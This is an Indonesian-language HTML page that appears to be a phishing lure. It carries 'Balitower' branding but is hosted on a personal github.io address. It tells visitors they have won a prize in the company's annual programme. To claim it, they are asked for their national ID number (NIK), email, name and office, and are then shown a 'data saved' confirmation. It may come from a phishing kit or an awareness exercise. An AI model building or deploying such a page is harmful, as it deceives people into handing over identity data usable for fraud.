<!DOCTYPE html>
<html>
<head>
    <title>Landing Page</title>
    <base href="https://fittrianto.github.io/"/>
    <script src="https://cdn.tailwindcss.com"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet"/>
    <style>
        /* Custom CSS untuk memastikan konten tetap dalam satu halaman */
        body, html {
            height: 100%;
            margin: 0;
        }
        .form-container {
            max-height: 80vh; /* Batasi tinggi form */
            overflow-y: auto; /* Tambahkan scroll jika konten melebihi tinggi */
        }
    </style>
</head>
<body class="bg-white font-roboto">
    <div class="flex flex-col items-center min-h-screen relative">
        <!-- Header -->
        <div class="w-full bg-white py-2 flex justify-center shadow-md mb-3">
            <img alt="Balitower logo" src="logo.png" width="150" class="w-24 md:w-32 lg:w-48"/>
        </div>

        <div class="absolute -z-50">
            <img alt="Balitower logo" class="w-full" src="bg-blue.png"/>
        </div>

        <!-- Main Content -->
        <div class="w-11/12 md:w-9/12 bg-white shadow-lg rounded-lg overflow-hidden form-container">
            <!-- Banner -->
            <div class="relative">
                <img alt="Decorative balloons" class="w-full" src="banner-text-1.png"/>
            </div>

            <!-- Form Section -->
            <div class="p-4 md:p-8">
                <h1 class="text-center text-xl md:text-2xl font-bold mb-4">Selamat Anda terpilih mendapat hadiah program tahunan perusahaan.</h1>
                <p class="text-center text-base md:text-lg mb-6">Untuk mendapatkan hadiah ini Anda harus melengkapi data-data dibawah ini ya !</p>

                <form class="grid grid-cols-1 md:grid-cols-2 gap-4 md:gap-6" id="confirmationForm" method="POST" action="">
                    <input name="__original_url" type="hidden" value="https://fittrianto.github.io/"/>
                    
                    <!-- Kolom 1: NIK dan Email -->
                    <div class="space-y-4">
                        <!-- NIK -->
                        <div class="flex flex-col">
                            <label for="nik" class="mb-2 font-medium">NIK:</label>
                            <input class="border border-gray-300 p-2 rounded" id="nik" name="nik" placeholder="Masukkan NIK" required="" type="text"/>
                        </div>
                        
                        <!-- Email -->
                        <div class="flex flex-col">
                            <label for="email" class="mb-2 font-medium">Email:</label>
                            <input class="border border-gray-300 p-2 rounded" id="email" name="email" placeholder="Masukkan Email" required="" type="email"/>
                        </div>
                    </div>
                    
                    <!-- Kolom 2: Nama dan Office -->
                    <div class="space-y-4">
                        <!-- Nama -->
                        <div class="flex flex-col">
                            <label for="name" class="mb-2 font-medium">Nama:</label>
                            <input class="border border-gray-300 p-2 rounded" id="name" name="name" placeholder="Masukkan Nama" required="" type="text"/>
                        </div>
                        
                        <!-- Kantor -->
                        <div class="flex flex-col">
                            <label for="office" class="mb-2 font-medium">Kantor:</label>
                            <input class="border border-gray-300 p-2 rounded" id="office" name="office" placeholder="Masukkan Kantor" required="" type="text"/>
                        </div>
                    </div>
                    
                    <!-- Tombol Konfirmasi -->
                    <div class="col-span-1 md:col-span-2 flex justify-center mt-6">
                        <button class="bg-orange-500 text-white px-6 py-2 md:px-8 md:py-3 rounded-lg hover:bg-orange-600 transition duration-300" type="submit">
                            Konfirmasi
                        </button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Footer -->
        <div class="fixed bottom-0 w-full">
            <img alt="Balitower logo" class="w-full" src="bg-footer-1.png"/>
        </div>
    </div>

    <script>
        document.getElementById("confirmationForm").addEventListener("submit", function(event) {
            event.preventDefault(); // Mencegah form dari pengiriman langsung
            Swal.fire({
                title: "Konfirmasi Berhasil!",
                text: "Data telah disimpan.",
                icon: "success",
                confirmButtonText: "OK"
            }).then(() => {
                // Lanjutkan pengiriman form setelah pesan ditampilkan
                event.target.submit();
            });
        });
    </script>
</body>
</html>